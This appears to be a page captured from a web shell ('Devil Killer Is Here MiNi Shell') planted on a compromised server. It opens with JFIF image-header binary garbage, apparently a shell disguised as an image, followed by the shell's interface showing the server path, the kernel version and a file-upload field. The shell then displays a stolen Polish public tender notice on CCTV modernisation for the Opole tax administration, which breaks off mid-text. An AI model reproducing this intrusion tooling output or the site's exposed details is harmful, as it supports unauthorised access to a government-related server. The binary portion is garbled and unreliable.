JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231030/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231030/0046929901-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Modernizacja systemu monitoringu w wybranych jednostkach Izby Administracji Skarbowej w Opolu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Izba Administracji Skarbowej w Opolu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 001022920</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Witolda Pileckiego 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Opole</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">45-331</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL524 - Opolski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ias.opole@mf.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.opolskie.kas.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Sprawy gospodarcze i finansowe</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacja systemu monitoringu w wybranych jednostkach Izby Administracji Skarbowej w Opolu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-fab0ade9-731e-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00469299</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-10-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00115209/14/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.8 Modernizacja systemu monitoringu w wybranych jednostkach Izby Administracji Skarbowej w Opolu</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-fab0ade9-731e-11ee-9aa3-96d3b4440790 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.3.) Informacje na temat sposobu udostępnienia zastrzeżonych dokumentów zamówienia</h3> 1.	Na podstawie art. 18 ust. 4 i art. 280 ust. 3 ustawy Pzp, Zamawiający wskazuje, że następujące części SWZ mają charakter poufny: <br/>1)	dokumentacja techniczna w postaci rzutów kondygnacji budynku zawierająca rozmieszczenie kamer i centrali stanowiąca Załącznik 1c do PPU;<br/>2)	dokumentacja techniczna w postaci rzutów kondygnacji budynku stanowiąca Załącznik 1d do PPU.<br/>2.	Wyżej wskazane informacje, zwane dalej informacjami o charakterze poufnym, zostaną udostępnione wyłącznie Wykonawcom, którzy złożą stosowny wniosek oraz zobowiążą się do nieujawniania tych informacji poprzez złożenie oświadczenia opatrzonego kwalifikowanym podpisem elektronicznym (zgodnie z zasadami reprezentacji Wykonawcy). <br/>Szczegóły sposób dostępu do informacji poufnych oraz wymogi mające na celu ochronę poufnego charakteru informacji został opisany w Rozdział 6 SWZ. <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">ias.opole@mf.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	W postępowaniu o udzielenie zamówienia korespondencja elektroniczna (inna niż oferta Wykonawcy i załączniki do oferty) odbywa się elektronicznie za pośrednictwem dedykowanego formularza dostępnego na ePUAP https://epuap.gov.pl/wps/portal. Korespondencja przesłana za pomocą tego formularza nie może być szyfrowana.<br/>2.	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp oraz do formularza do komunikacji.<br/>3.	Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej przekazywanej przy ich użyciu, opisane zostały w Regulaminie ePUAP</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna znajduje się w rozdziale 40 SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">1601-ILZ.260.56.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na kilka części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część I - Modernizacja systemu CCTV w budynku Opolskiego Urzędu Celno-Skarbowego w Opolu ul. Drzymały 22, 45-342 Opole; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">51314000-6 - Usługi instalowania urządzeń wideo</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">32323500-8 - Urządzenia do nadzoru wideo</p> <p class="mb-0">32300000-6 - Odbiorniki telewizyjne i radiowe oraz aparatura nagrywająca dźwięk lub obraz lub aparatura powielająca</p> <p class="mb-0">48520000-9 - Pakiety oprogramowania multimedialnego</p> <p class="mb-0">45314300-4 - Instalowanie infrastruktury okablowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Kryteria oceny ofert są jednakowe dla wszystkich części zamówienia<br/>2.	Zamawiający dokona oceny ofert w odniesieniu do każdej części odrębnie.<br/>3.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>1)	Cena (C) – waga kryterium 60 %;<br/>2)	Przedłużenie okresu gwarancji (G) – waga kryterium 20%;<br/>3)	Termin realizacji zamówienia (T) - waga kryterium 20%.<br/>4.	Zasady oceny ofert w poszczególnych kryteriach:<br/>1)	W kryterium „Cena” zostanie zastosowany wzór: C=(Cn/Cb) x 60<br/>gdzie:<br/>	C – ilość punktów przyznanych Wykonawcy w kryterium „Cena”<br/>	Cn – najniższa cena ofertowa, spośród wszystkich ofert niepodlegających odrzuceniu<br/>	Cb – cena ofertowa w ofercie badanej<br/>a)	Podstawą przyznania punktów w kryterium „Cena” będzie cena ofertowa brutto podana przez Wykonawcę w formularzu ofertowym.<br/>b)	Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/>2)	Kryterium „Przedłużenie okresu gwarancji”: <br/>Gwarancja na wykonany przedmiot zamówienia na instalację, dostarczone urządzenia i oprogramowanie wynosi minimum 3 lata (36 m-cy) od dnia podpisania protokołu odbioru końcowego. Zamawiający w ramach kryterium (G) „Przedłużenie okresu gwarancji”, przyzna Wykonawcy punkty według następujących zasad:<br/>a)	zaoferowanie 5-letniego okresu gwarancji (60 m-cy) – 20 pkt;<br/>b)	zaoferowanie 4-letniego okresu gwarancji (48 m-cy) – 10 pkt;<br/>c)	zaoferowanie 3-letniego okresu gwarancji (36 m-cy) – 0 pkt.<br/>Uwaga: Zaoferowanie dłuższego okresu gwarancji nie będzie skutkować odrzuceniem oferty ani przyznaniem wyższej punktacji. W takim przypadku Wykonawca otrzyma taką samą liczbę punktów, jak za wydłużenie okresu gwarancji do 5 lat. Zaoferowanie okresu krótszego niż minimalny spowoduje odrzucenie oferty jako niezgodnej z SWZ.<br/>3)	Kryterium „Termin realizacji zamówienia”:<br/>a)	podstawą przyznania punktów będzie liczba dni roboczych na wykonanie usługi podana przez Wykonawcę w formularzu ofertowym. Zamawiający będzie przyznawał punkty w następujący sposób:<br/>-	za zaoferowane terminu wykonania zamówienia w ciągu 14 dni kalendarzowych od dnia podpisania umowy Wykonawca otrzyma 0 pkt, <br/>-	za zaoferowane terminu wykonania zamówienia w ciągu 10 dni kalendarzowych od dnia podpisania umowy Wykonawca otrzyma 10 pkt,<br/>-	za zaoferowanie terminu wykonania zamówienia w ciągu 7 dni kalendarzowych od dnia podpisania umowy Wykonawca otrzyma 20 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Przedłużenie okresu gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część II - Modernizacja systemu CCTV w budynku Urzędu Skarbowego w Nysie ul. Bolesława Krzywoustego 23, 48-300 Nysa </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">51314000-6 - Usługi instalowania urządzeń wideo</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">32323500-8 - Urządzenia do nadzoru wideo</p> <p class="mb-0">32300000-6 - Odbiorniki telewizyjne i radiowe oraz aparatura nagrywająca dźwięk lub obraz lub aparatura powielająca</p> <p class="mb-0">48520000-9 - Pakiety oprogramowania multimedialnego</p> <p class="mb-0">45314300-4 - Instalowanie infrastruktury okablowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Kryteria oceny ofert są jednakowe dla wszystkich części zamówienia<br/>2.	Zamawiający dokona oceny ofert w odniesieniu do każdej części odrębnie.<br/>3.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>1)	Cena (C) – waga kryterium 60 %;<br/>2)	Przedłużenie okresu gwarancji (G) – waga kryterium 20%;<br/>3)	Termin realizacji zamówienia (T) - waga kryterium 20%.<br/>4.	Zasady oceny ofert w poszczególnych kryteriach:<br/>1)	W kryterium „Cena” zostanie zastosowany wzór: C=(Cn/Cb) x 60<br/>gdzie:<br/>	C – ilość punktów przyznanych Wykonawcy w kryterium „Cena”<br/>	Cn – najniższa cena ofertowa, spośród wszystkich ofert niepodlegających odrzuceniu<br/>	Cb – cena ofertowa w ofercie badanej<br/>a)	Podstawą przyznania punktów w kryterium „Cena” będzie cena ofertowa brutto podana przez Wykonawcę w formularzu ofertowym.<br/>b)	Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/>2)	Kryterium „Przedłużenie okresu gwarancji”: <br/>Gwarancja na wykonany przedmiot zamówienia na instalację, dostarczone urządzenia i oprogramowanie wynosi minimum 3 lata (36 m-cy) od dnia podpisania protokołu odbioru końcowego. Zamawiający w ramach kryterium (G) „Przedłużenie okresu gwarancji”, przyzna Wykonawcy punkty według następujących zasad:<br/>a)	zaoferowanie 5-letniego okresu gwarancji (60 m-cy) – 20 pkt;<br/>b)	zaoferowanie 4-letniego okresu gwarancji (48 m-cy) – 10 pkt;<br/>c)	zaoferowanie 3-letniego okresu gwarancji (36 m-cy) – 0 pkt.<br/>Uwaga: Zaoferowanie dłuższego okresu gwarancji nie będzie skutkować odrzuceniem oferty ani przyznaniem wyższej punktacji. W takim przypadku Wykonawca otrzyma taką samą liczbę punktów, jak za wydłużenie okresu gwarancji do 5 lat. Zaoferowanie okresu krótszego niż minimalny spowoduje odrzucenie oferty jako niezgodnej z SWZ.<br/>3)	Kryterium „Termin realizacji zamówienia”:<br/>a)	podstawą przyznania punktów będzie liczba dni roboczych na wykonanie usługi podana przez Wykonawcę w formularzu ofertowym. Zamawiający będzie przyznawał punkty w następujący sposób:<br/>-	za zaoferowane terminu wykonania zamówienia w ciągu 14 dni kalendarzowych od dnia podpisania umowy Wykonawca otrzyma 0 pkt, <br/>-	za zaoferowane terminu wykonania zamówienia w ciągu 10 dni kalendarzowych od dnia podpisania umowy Wykonawca otrzyma 10 pkt,<br/>-	za zaoferowanie terminu wykonania zamówienia w ciągu 7 dni kalendarzowych od dnia podpisania umowy Wykonawca otrzyma 20 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Przedłużenie okresu gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część III - Dostawa i montaż nowych urządzeń CCTV w budynku Urzędu Skarbowego w Oleśnie ul. Pieloka 21, 46-300 Olesno </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">51314000-6 - Usługi instalowania urządzeń wideo</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">32323500-8 - Urządzenia do nadzoru wideo</p> <p class="mb-0">32300000-6 - Odbiorniki telewizyjne i radiowe oraz aparatura nagrywająca dźwięk lub obraz lub aparatura powielająca</p> <p class="mb-0">48520000-9 - Pakiety oprogramowania multimedialnego</p> <p class="mb-0">45314300-4 - Instalowanie infrastruktury okablowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Kryteria oceny ofert są jednakowe dla wszystkich części zamówienia<br/>2.	Zamawiający dokona oceny ofert w odniesieniu do każdej części odrębnie.<br/>3.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>1)	Cena (C) – waga kryterium 60 %;<br/>2)	Przedłużenie okresu gwarancji (G) – waga kryterium 20%;<br/>3)	Termin realizacji zamówienia (T) - waga kryterium 20%.<br/>4.	Zasady oceny ofert w poszczególnych kryteriach:<br/>1)	W kryterium „Cena” zostanie zastosowany wzór: C=(Cn/Cb) x 60<br/>gdzie:<br/>	C – ilość punktów przyznanych Wykonawcy w kryterium „Cena”<br/>	Cn – najniższa cena ofertowa, spośród wszystkich ofert niepodlegających odrzuceniu<br/>	Cb – cena ofertowa w ofercie badanej<br/>a)	Podstawą przyznania punktów w kryterium „Cena” będzie cena ofertowa brutto podana przez Wykonawcę w formularzu ofertowym.<br/>b)	Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/>2)	Kryterium „Przedłużenie okresu gwarancji”: <br/>Gwarancja na wykonany przedmiot zamówienia na instalację, dostarczone urządzenia i oprogramowanie wynosi minimum 3 lata (36 m-cy) od dnia podpisania protokołu odbioru końcowego. Zamawiający w ramach kryterium (G) „Przedłużenie okresu gwarancji”, przyzna Wykonawcy punkty według następujących zasad:<br/>a)	zaoferowanie 5-letniego okresu gwarancji (60 m-cy) – 20 pkt;<br/>b)	zaoferowanie 4-letniego okresu gwarancji (48 m-cy) – 10 pkt;<br/>c)	zaoferowanie 3-letniego okresu gwarancji (36 m-cy) – 0 pkt.<br/>Uwaga: Zaoferowanie dłuższego okresu gwarancji nie będzie skutkować odrzuceniem oferty ani przyznaniem wyższej punktacji. W takim przypadku Wykonawca otrzyma taką samą liczbę punktów, jak za wydłużenie okresu gwarancji do 5 lat. Zaoferowanie okresu krótszego niż minimalny spowoduje odrzucenie oferty jako niezgodnej z SWZ.<br/>3)	Kryterium „Termin realizacji zamówienia”:<br/>a)	podstawą przyznania punktów będzie liczba dni roboczych na wykonanie usługi podana przez Wykonawcę w formularzu ofertowym. Zamawiający będzie przyznawał punkty w następujący sposób:<br/>-	za zaoferowane terminu wykonania zamówienia w ciągu 14 dni kalendarzowych od dnia podpisania umowy Wykonawca otrzyma 0 pkt, <br/>-	za zaoferowane terminu wykonania zamówienia w ciągu 10 dni kalendarzowych od dnia podpisania umowy Wykonawca otrzyma 10 pkt,<br/>-	za zaoferowanie terminu wykonania zamówienia w ciągu 7 dni kalendarzowych od dnia podpisania umowy Wykonawca otrzyma 20 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Przedłużenie 